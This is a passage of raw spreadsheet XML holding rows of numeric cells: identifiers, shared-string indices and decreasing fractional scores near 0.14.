        <v>16279</v>
      </c>
      <c r="D16880" s="2">
        <v>1.0</v>
      </c>
      <c r="E16880" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16880" s="2">
        <v>0.1403903903903904</v>
      </c>
    </row>
    <row r="16881" ht="15.75" customHeight="1">
      <c r="A16881" s="1">
        <v>8254.0</v>
      </c>
      <c r="B16881" s="2">
        <v>5.3380778E7</v>
      </c>
      <c r="C16881" s="2" t="s">
        <v>16280</v>
      </c>
      <c r="D16881" s="2">
        <v>1.0</v>
      </c>
      <c r="E16881" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16881" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="16882" ht="15.75" customHeight="1">
      <c r="A16882" s="1">
        <v>5649.0</v>
      </c>
      <c r="B16882" s="2">
        <v>4.6276408E7</v>
      </c>
      <c r="C16882" s="2" t="s">
        <v>16281</v>
      </c>
      <c r="D16882" s="2">
        <v>1.0</v>
      </c>
      <c r="E16882" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16882" s="2">
        <v>0.1402116402116403</v>
      </c>
    </row>
    <row r="16883" ht="15.75" customHeight="1">
      <c r="A16883" s="1">
        <v>30242.0</v>
      </c>
      <c r="B16883" s="2">
        <v>3.7542519E7</v>
      </c>
      <c r="C16883" s="2" t="s">
        <v>16282</v>
      </c>
      <c r="D16883" s="2">
        <v>1.0</v>
      </c>
      <c r="E16883" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16883" s="2">
        <v>0.1402116402116403</v>
      </c>
    </row>
    <row r="16884" ht="15.75" customHeight="1">
      <c r="A16884" s="1">
        <v>12122.0</v>
      </c>
      <c r="B16884" s="2">
        <v>2.6907799E7</v>
      </c>
      <c r="C16884" s="2" t="s">
        <v>16283</v>
      </c>
      <c r="D16884" s="2">
        <v>1.0</v>
      </c>
      <c r="E16884" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16884" s="2">
        <v>0.1401326699834163</v>
      </c>
    </row>
    <row r="16885" ht="15.75" customHeight="1">
      <c r="A16885" s="1">
        <v>33016.0</v>
      </c>
      <c r="B16885" s="2">
        <v>6653363.0</v>
      </c>
      <c r="C16885" s="2" t="s">
        <v>16284</v>
      </c>
      <c r="D16885" s="2">
        <v>1.0</v>
      </c>
      <c r="E16885" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16885" s="2">
        <v>0.1400625978090767</v>
      </c>
    </row>
    <row r="16886" ht="15.75" customHeight="1">
      <c r="A16886" s="1">
        <v>42.0</v>
      </c>
      <c r="B16886" s="2">
        <v>1.0742559E7</v>
      </c>
      <c r="C16886" s="2" t="s">
        <v>16285</v>
      </c>
      <c r="D16886" s="2">
        <v>1.0</v>
      </c>
      <c r="E16886" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16886" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="16887" ht="15.75" customHeight="1">
      <c r="A16887" s="1">
        <v>22498.0</v>
      </c>
      <c r="B16887" s="2">
        <v>3.7204738E7</v>
      </c>
      <c r="C16887" s="2" t="s">
        <v>16286</v>
      </c>
      <c r="D16887" s="2">
        <v>1.0</v>
      </c>
      <c r="E16887" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16887" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="16888" ht="15.75" customHeight="1">
      <c r="A16888" s="1">
        <v>31175.0</v>
      </c>
      <c r="B16888" s="2">
        <v>4913043.0</v>
      </c>
      <c r="C16888" s="2" t="s">
        <v>16287</v>
      </c>
      <c r="D16888" s="2">
        <v>1.0</v>
      </c>
      <c r="E16888" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16888" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="16889" ht="15.75" customHeight="1">
      <c r="A16889" s="1">
        <v>32502.0</v>
      </c>
      <c r="B16889" s="2">
        <v>5713783.0</v>
      </c>
      <c r="C16889" s="2" t="s">
        <v>16288</v>
      </c>
      <c r="D16889" s="2">
        <v>1.0</v>
      </c>
      <c r="E16889" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16889" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="16890" ht="15.75" customHeight="1">
      <c r="A16890" s="1">
        <v>19676.0</v>
      </c>
      <c r="B16890" s="2">
        <v>5.643072E7</v>
      </c>
      <c r="C16890" s="2" t="s">
        <v>16289</v>
      </c>
      <c r="D16890" s="2">
        <v>1.0</v>
      </c>
      <c r="E16890" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16890" s="2">
        <v>0.1397569444444445</v>
      </c>
    </row>
    <row r="16891" ht="15.75" customHeight="1">
      <c r="A16891" s="1">
        <v>1217.0</v>
      </c>
      <c r="B16891" s="2">
        <v>2.4878529E7</v>
      </c>
      <c r="C16891" s="2" t="s">
        <v>16290</v>
      </c>
      <c r="D16891" s="2">
        <v>1.0</v>
      </c>
      <c r="E16891" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16891" s="2">
        <v>0.1396198830409357</v>
      </c>
    </row>
    <row r="16892" ht="15.75" customHeight="1">
      <c r="A16892" s="1">
        <v>11295.0</v>
      </c>
      <c r="B16892" s="2">
        <v>2.0942148E7</v>
      </c>
      <c r="C16892" s="2" t="s">
        <v>16291</v>
      </c>
      <c r="D16892" s="2">
        <v>1.0</v>
      </c>
      <c r="E16892" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16892" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="16893" ht="15.75" customHeight="1">
      <c r="A16893" s="1">
        <v>14494.0</v>
      </c>
      <c r="B16893" s="2">
        <v>3.9630106E7</v>
      </c>
      <c r="C16893" s="2" t="s">
        <v>16292</v>
      </c>
      <c r="D16893" s="2">
        <v>1.0</v>
      </c>
      <c r="E16893" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16893" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="16894" ht="15.75" customHeight="1">
      <c r="A16894" s="1">
        <v>19364.0</v>
      </c>
      <c r="B16894" s="2">
        <v>5.5468669E7</v>
      </c>
      <c r="C16894" s="2" t="s">
        <v>16293</v>
      </c>
      <c r="D16894" s="2">
        <v>1.0</v>
      </c>
      <c r="E16894" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16894" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="16895" ht="15.75" customHeight="1">
      <c r="A16895" s="1">
        <v>19803.0</v>
      </c>
      <c r="B16895" s="2">
        <v>5.6882646E7</v>
      </c>
      <c r="C16895" s="2" t="s">
        <v>16294</v>
      </c>
      <c r="D16895" s="2">
        <v>1.0</v>
      </c>
      <c r="E16895" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16895" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="16896" ht="15.75" customHeight="1">
      <c r="A16896" s="1">
        <v>23842.0</v>
      </c>
      <c r="B16896" s="2">
        <v>8140525.0</v>
      </c>
      <c r="C16896" s="2" t="s">
        <v>16295</v>
      </c>
      <c r="D16896" s="2">
        <v>1.0</v>
      </c>
      <c r="E16896" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16896" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="16897" ht="15.75" customHeight="1">
      <c r="A16897" s="1">
        <v>5932.0</v>
      </c>
      <c r="B16897" s="2">
        <v>4.7261472E7</v>
      </c>
      <c r="C16897" s="2" t="s">
        <v>16296</v>
      </c>
      <c r="D16897" s="2">
        <v>1.0</v>
      </c>
      <c r="E16897" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16897" s="2">
        <v>0.139344262295082</v>
      </c>
    </row>
    <row r="16898" ht="15.75" customHeight="1">
      <c r="A16898" s="1">
        <v>15335.0</v>
      </c>
      <c r="B16898" s="2">
        <v>4.2578044E7</v>
      </c>
      <c r="C16898" s="2" t="s">
        <v>16297</v>
      </c>
      <c r="D16898" s="2">
        <v>1.0</v>
      </c>
      <c r="E16898" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16898" s="2">
        <v>0.1392914653784219</v>
      </c>
    </row>
    <row r="16899" ht="15.75" customHeight="1">
      <c r="A16899" s="1">
        <v>4299.0</v>
      </c>
      <c r="B16899" s="2">
        <v>4.1926528E7</v>
      </c>
      <c r="C16899" s="2" t="s">
        <v>16298</v>
      </c>
      <c r="D16899" s="2">
        <v>1.0</v>
      </c>
      <c r="E16899" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16899" s="2">
        <v>0.1392694063926941</v>
      </c>
    </row>
    <row r="16900" ht="15.75" customHeight="1">
      <c r="A16900" s="1">
        <v>25010.0</v>
      </c>
      <c r="B16900" s="2">
        <v>1.2769247E7</v>
      </c>
      <c r="C16900" s="2" t="s">
        <v>16299</v>
      </c>
      <c r="D16900" s="2">
        <v>1.0</v>
      </c>
      <c r="E16900" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16900" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="16901" ht="15.75" customHeight="1">
      <c r="A16901" s="1">
        <v>25665.0</v>
      </c>
      <c r="B16901" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C16901" s="2" t="s">
        <v>16300</v>
      </c>
      <c r="D16901" s="2">
        <v>1.0</v>
      </c>
      <c r="E16901" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16901" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="16902" ht="15.75" customHeight="1">
      <c r="A16902" s="1">
        <v>25717.0</v>
      </c>
      <c r="B16902" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C16902" s="2" t="s">
        <v>16301</v>
      </c>
      <c r="D16902" s="2">
        <v>1.0</v>
      </c>
      <c r="E16902" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16902" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="16903" ht="15.75" customHeight="1">
      <c r="A16903" s="1">
        <v>31423.0</v>
      </c>
      <c r="B16903" s="2">
        <v>5.0134747E7</v>
      </c>
      <c r="C16903" s="2" t="s">
        <v>16302</v>
      </c>
      <c r="D16903" s="2">
        <v>1.0</v>
      </c>
      <c r="E16903" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16903" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="16904" ht="15.75" customHeight="1">
      <c r="A16904" s="1">
        <v>1555.0</v>
      </c>
      <c r="B16904" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C16904" s="2" t="s">
        <v>16303</v>
      </c>
      <c r="D16904" s="2">
        <v>1.0</v>
      </c>
      <c r="E16904" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16904" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="16905" ht="15.75" customHeight="1">
      <c r="A16905" s="1">
        <v>10808.0</v>
      </c>
      <c r="B16905" s="2">
        <v>1.5852105E7</v>
      </c>
      <c r="C16905" s="2" t="s">
        <v>16304</v>
      </c>
      <c r="D16905" s="2">
        <v>1.0</v>
      </c>
      <c r="E16905" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16905" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="16906" ht="15.75" customHeight="1">
      <c r="A16906" s="1">
        <v>23241.0</v>
      </c>
      <c r="B16906" s="2">
        <v>5301250.0</v>
      </c>
      <c r="C16906" s="2" t="s">
        <v>16269</v>
      </c>
      <c r="D16906" s="2">
        <v>1.0</v>
      </c>
      <c r="E16906" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16906" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="16907" ht="15.75" customHeight="1">
      <c r="A16907" s="1">
        <v>25675.0</v>
      </c>
      <c r="B16907" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C16907" s="2" t="s">
        <v>16305</v>
      </c>
      <c r="D16907" s="2">
        <v>1.0</v>
      </c>
      <c r="E16907" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16907" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="16908" ht="15.75" customHeight="1">
      <c r="A16908" s="1">
        <v>26276.0</v>
      </c>
      <c r="B16908" s="2">
        <v>1.6420654E7</v>
      </c>
      <c r="C16908" s="2" t="s">
        <v>16306</v>
      </c>
      <c r="D16908" s="2">
        <v>1.0</v>
      </c>
      <c r="E16908" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16908" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="16909" ht="15.75" customHeight="1">
      <c r="A16909" s="1">
        <v>27921.0</v>
      </c>
      <c r="B16909" s="2">
        <v>2.3764274E7</v>
      </c>
      <c r="C16909" s="2" t="s">
        <v>16307</v>
      </c>
      <c r="D16909" s="2">
        <v>1.0</v>
      </c>
      <c r="E16909" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16909" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="16910" ht="15.75" customHeight="1">
      <c r="A16910" s="1">
        <v>31864.0</v>
      </c>
      <c r="B16910" s="2">
        <v>5284010.0</v>
      </c>
      <c r="C16910" s="2" t="s">
        <v>16308</v>
      </c>
      <c r="D16910" s="2">
        <v>1.0</v>
      </c>
      <c r="E16910" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16910" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="16911" ht="15.75" customHeight="1">
      <c r="A16911" s="1">
        <v>33118.0</v>
      </c>
      <c r="B16911" s="2">
        <v>6974784.0</v>
      </c>
      <c r="C16911" s="2" t="s">
        <v>11068</v>
      </c>
      <c r="D16911" s="2">
        <v>1.0</v>
      </c>
      <c r="E16911" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16911" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="16912" ht="15.75" customHeight="1">
      <c r="A16912" s="1">
        <v>23958.0</v>
      </c>
      <c r="B16912" s="2">
        <v>8971045.0</v>
      </c>
      <c r="C16912" s="2" t="s">
        <v>16309</v>
      </c>
      <c r="D16912" s="2">
        <v>1.0</v>
      </c>
      <c r="E16912" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16912" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="16913" ht="15.75" customHeight="1">
      <c r="A16913" s="1">
        <v>5.0</v>
      </c>
      <c r="B16913" s="2">
        <v>1.0132153E7</v>
      </c>
      <c r="C16913" s="2" t="s">
        <v>16310</v>
      </c>
      <c r="D16913" s="2">
        <v>1.0</v>
      </c>
      <c r="E16913" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16913" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16914" ht="15.75" customHeight="1">
      <c r="A16914" s="1">
        <v>6576.0</v>
      </c>
      <c r="B16914" s="2">
        <v>4.891559E7</v>
      </c>
      <c r="C16914" s="2" t="s">
        <v>16311</v>
      </c>
      <c r="D16914" s="2">
        <v>1.0</v>
      </c>
      <c r="E16914" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16914" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16915" ht="15.75" customHeight="1">
      <c r="A16915" s="1">
        <v>7055.0</v>
      </c>
      <c r="B16915" s="2">
        <v>5.0200467E7</v>
      </c>
      <c r="C16915" s="2" t="s">
        <v>16312</v>
      </c>
      <c r="D16915" s="2">
        <v>1.0</v>
      </c>
      <c r="E16915" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16915" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16916" ht="15.75" customHeight="1">
      <c r="A16916" s="1">
        <v>12092.0</v>
      </c>
      <c r="B16916" s="2">
        <v>2.6707714E7</v>
      </c>
      <c r="C16916" s="2" t="s">
        <v>16313</v>
      </c>
      <c r="D16916" s="2">
        <v>1.0</v>
      </c>
      <c r="E16916" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16916" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16917" ht="15.75" customHeight="1">
      <c r="A16917" s="1">
        <v>13436.0</v>
      </c>
      <c r="B16917" s="2">
        <v>3.510925E7</v>
      </c>
      <c r="C16917" s="2" t="s">
        <v>16314</v>
      </c>
      <c r="D16917" s="2">
        <v>1.0</v>
      </c>
      <c r="E16917" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16917" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16918" ht="15.75" customHeight="1">
      <c r="A16918" s="1">
        <v>14259.0</v>
      </c>
      <c r="B16918" s="2">
        <v>3.8390159E7</v>
      </c>
      <c r="C16918" s="2" t="s">
        <v>16315</v>
      </c>
      <c r="D16918" s="2">
        <v>1.0</v>
      </c>
      <c r="E16918" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16918" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16919" ht="15.75" customHeight="1">
      <c r="A16919" s="1">
        <v>17563.0</v>
      </c>
      <c r="B16919" s="2">
        <v>5.0237543E7</v>
      </c>
      <c r="C16919" s="2" t="s">
        <v>16316</v>
      </c>
      <c r="D16919" s="2">
        <v>1.0</v>
      </c>
      <c r="E16919" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16919" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16920" ht="15.75" customHeight="1">
      <c r="A16920" s="1">
        <v>19194.0</v>
      </c>
      <c r="B16920" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C16920" s="2" t="s">
        <v>16317</v>
      </c>
      <c r="D16920" s="2">
        <v>1.0</v>
      </c>
      <c r="E16920" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16920" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16921" ht="15.75" customHeight="1">
      <c r="A16921" s="1">
        <v>20198.0</v>
      </c>
      <c r="B16921" s="2">
        <v>1.0561468E7</v>
      </c>
      <c r="C16921" s="2" t="s">
        <v>16318</v>
      </c>
      <c r="D16921" s="2">
        <v>1.0</v>
      </c>
      <c r="E16921" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16921" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16922" ht="15.75" customHeight="1">
      <c r="A16922" s="1">
        <v>20966.0</v>
      </c>
      <c r="B16922" s="2">
        <v>1.6771673E7</v>
      </c>
      <c r="C16922" s="2" t="s">
        <v>16319</v>
      </c>
      <c r="D16922" s="2">
        <v>1.0</v>
      </c>
      <c r="E16922" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16922" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16923" ht="15.75" customHeight="1">
      <c r="A16923" s="1">
        <v>23398.0</v>
      </c>
      <c r="B16923" s="2">
        <v>5.5766506E7</v>
      </c>
      <c r="C16923" s="2" t="s">
        <v>16320</v>
      </c>
      <c r="D16923" s="2">
        <v>1.0</v>
      </c>
      <c r="E16923" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16923" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16924" ht="15.75" customHeight="1">
      <c r="A16924" s="1">
        <v>23627.0</v>
      </c>
      <c r="B16924" s="2">
        <v>6546494.0</v>
      </c>
      <c r="C16924" s="2" t="s">
        <v>16321</v>
      </c>
      <c r="D16924" s="2">
        <v>1.0</v>
      </c>
      <c r="E16924" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16924" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16925" ht="15.75" customHeight="1">
      <c r="A16925" s="1">
        <v>23831.0</v>
      </c>
      <c r="B16925" s="2">
        <v>8079847.0</v>
      </c>
      <c r="C16925" s="2" t="s">
        <v>16322</v>
      </c>
      <c r="D16925" s="2">
        <v>1.0</v>
      </c>
      <c r="E16925" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16925" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16926" ht="15.75" customHeight="1">
      <c r="A16926" s="1">
        <v>24083.0</v>
      </c>
      <c r="B16926" s="2">
        <v>9722586.0</v>
      </c>
      <c r="C16926" s="2" t="s">
        <v>16323</v>
      </c>
      <c r="D16926" s="2">
        <v>1.0</v>
      </c>
      <c r="E16926" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16926" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16927" ht="15.75" customHeight="1">
      <c r="A16927" s="1">
        <v>25614.0</v>
      </c>
      <c r="B16927" s="2">
        <v>1.4402219E7</v>
      </c>
      <c r="C16927" s="2" t="s">
        <v>16324</v>
      </c>
      <c r="D16927" s="2">
        <v>1.0</v>
      </c>
      <c r="E16927" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16927" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16928" ht="15.75" customHeight="1">
      <c r="A16928" s="1">
        <v>25669.0</v>
      </c>
      <c r="B16928" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C16928" s="2" t="s">
        <v>16325</v>
      </c>
      <c r="D16928" s="2">
        <v>1.0</v>
      </c>
      <c r="E16928" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16928" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16929" ht="15.75" customHeight="1">
      <c r="A16929" s="1">
        <v>26342.0</v>
      </c>
      <c r="B16929" s="2">
        <v>1.6771672E7</v>
      </c>
      <c r="C16929" s="2" t="s">
        <v>16319</v>
      </c>
      <c r="D16929" s="2">
        <v>1.0</v>
      </c>
      <c r="E16929" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16929" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16930" ht="15.75" customHeight="1">
      <c r="A16930" s="1">
        <v>30902.0</v>
      </c>
      <c r="B16930" s="2">
        <v>4.6743593E7</v>
      </c>
      <c r="C16930" s="2" t="s">
        <v>16326</v>
      </c>
      <c r="D16930" s="2">
        <v>1.0</v>
      </c>
      <c r="E16930" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16930" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16931" ht="15.75" customHeight="1">
      <c r="A16931" s="1">
        <v>32065.0</v>
      </c>
      <c r="B16931" s="2">
        <v>5379390.0</v>
      </c>
      <c r="C16931" s="2" t="s">
        <v>16327</v>
      </c>
      <c r="D16931" s="2">
        <v>1.0</v>
      </c>
      <c r="E16931" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16931" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16932" ht="15.75" customHeight="1">
      <c r="A16932" s="1">
        <v>33509.0</v>
      </c>
      <c r="B16932" s="2">
        <v>8079846.0</v>
      </c>
      <c r="C16932" s="2" t="s">
        <v>16322</v>
      </c>
      <c r="D16932" s="2">
        <v>1.0</v>
      </c>
      <c r="E16932" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16932" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16933" ht="15.75" customHeight="1">
      <c r="A16933" s="1">
        <v>34110.0</v>
      </c>
      <c r="B16933" s="2">
        <v>9722585.0</v>
      </c>
      <c r="C16933" s="2" t="s">
        <v>16323</v>
      </c>
      <c r="D16933" s="2">
        <v>1.0</v>
      </c>
      <c r="E16933" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16933" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="16934" ht="15.75" customHeight="1">
      <c r="A16934" s="1">
        <v>11705.0</v>
      </c>
      <c r="B16934" s="2">
        <v>2.3562286E7</v>
      </c>
      <c r="C16934" s="2" t="s">
        <v>16328</v>
      </c>
      <c r="D16934" s="2">
        <v>1.0</v>
      </c>
      <c r="E16934" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16934" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="16935" ht="15.75" customHeight="1">
      <c r="A16935" s="1">
        <v>10163.0</v>
      </c>
      <c r="B16935" s="2">
        <v>5.7339651E7</v>
      </c>
      <c r="C16935" s="2" t="s">
        <v>16329</v>
      </c>
      <c r="D16935" s="2">
        <v>1.0</v>
      </c>
      <c r="E16935" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16935" s="2">
        <v>0.1381172839506173</v>
      </c>
    </row>
    <row r="16936" ht="15.75" customHeight="1">
      <c r="A16936" s="1">
        <v>14763.0</v>
      </c>
      <c r="B16936" s="2">
        <v>4.0830907E7</v>
      </c>
      <c r="C16936" s="2" t="s">
        <v>16330</v>
      </c>
      <c r="D16936" s="2">
        <v>1.0</v>
      </c>
      <c r="E16936" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16936" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="16937" ht="15.75" customHeight="1">
      <c r="A16937" s="1">
        <v>19309.0</v>
      </c>
      <c r="B16937" s="2">
        <v>5.5264681E7</v>
      </c>
      <c r="C16937" s="2" t="s">
        <v>16331</v>
      </c>
      <c r="D16937" s="2">
        <v>1.0</v>
      </c>
      <c r="E16937" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16937" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="16938" ht="15.75" customHeight="1">
      <c r="A16938" s="1">
        <v>24006.0</v>
      </c>
      <c r="B16938" s="2">
        <v>9281404.0</v>
      </c>
      <c r="C16938" s="2" t="s">
        <v>16332</v>
      </c>
      <c r="D16938" s="2">
        <v>1.0</v>
      </c>
      <c r="E16938" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16938" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="16939" ht="15.75" customHeight="1">
      <c r="A16939" s="1">
        <v>30189.0</v>
      </c>
      <c r="B16939" s="2">
        <v>3.7204737E7</v>
      </c>
      <c r="C16939" s="2" t="s">
        <v>16286</v>
      </c>
      <c r="D16939" s="2">
        <v>1.0</v>
      </c>
      <c r="E16939" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16939" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="16940" ht="15.75" customHeight="1">
      <c r="A16940" s="1">
        <v>33924.0</v>
      </c>
      <c r="B16940" s="2">
        <v>9281403.0</v>
      </c>
      <c r="C16940" s="2" t="s">
        <v>16333</v>
      </c>
      <c r="D16940" s="2">
        <v>1.0</v>
      </c>
      <c r="E16940" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16940" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="16941" ht="15.75" customHeight="1">
      <c r="A16941" s="1">
        <v>25548.0</v>
      </c>
      <c r="B16941" s="2">
        <v>1.4278E7</v>
      </c>
      <c r="C16941" s="2" t="s">
        <v>16334</v>
      </c>
      <c r="D16941" s="2">
        <v>1.0</v>
      </c>
      <c r="E16941" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16941" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="16942" ht="15.75" customHeight="1">
      <c r="A16942" s="1">
        <v>18834.0</v>
      </c>
      <c r="B16942" s="2">
        <v>5.3940684E7</v>
      </c>
      <c r="C16942" s="2" t="s">
        <v>16335</v>
      </c>
      <c r="D16942" s="2">
        <v>1.0</v>
      </c>
      <c r="E16942" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16942" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="16943" ht="15.75" customHeight="1">
      <c r="A16943" s="1">
        <v>19945.0</v>
      </c>
      <c r="B16943" s="2">
        <v>5.7495651E7</v>
      </c>
      <c r="C16943" s="2" t="s">
        <v>16336</v>
      </c>
      <c r="D16943" s="2">
        <v>1.0</v>
      </c>
      <c r="E16943" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16943" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="16944" ht="15.75" customHeight="1">
      <c r="A16944" s="1">
        <v>20667.0</v>
      </c>
      <c r="B16944" s="2">
        <v>1.4354025E7</v>
      </c>
      <c r="C16944" s="2" t="s">
        <v>16337</v>
      </c>
      <c r="D16944" s="2">
        <v>1.0</v>
      </c>
      <c r="E16944" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16944" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="16945" ht="15.75" customHeight="1">
      <c r="A16945" s="1">
        <v>23798.0</v>
      </c>
      <c r="B16945" s="2">
        <v>7775523.0</v>
      </c>
      <c r="C16945" s="2" t="s">
        <v>16338</v>
      </c>
      <c r="D16945" s="2">
        <v>1.0</v>
      </c>
      <c r="E16945" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16945" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="16946" ht="15.75" customHeight="1">
      <c r="A16946" s="1">
        <v>28176.0</v>
      </c>
      <c r="B16946" s="2">
        <v>2.4982864E7</v>
      </c>
      <c r="C16946" s="2" t="s">
        <v>16339</v>
      </c>
      <c r="D16946" s="2">
        <v>1.0</v>
      </c>
      <c r="E16946" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16946" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="16947" ht="15.75" customHeight="1">
      <c r="A16947" s="1">
        <v>32825.0</v>
      </c>
      <c r="B16947" s="2">
        <v>6218275.0</v>
      </c>
      <c r="C16947" s="2" t="s">
        <v>16340</v>
      </c>
      <c r="D16947" s="2">
        <v>1.0</v>
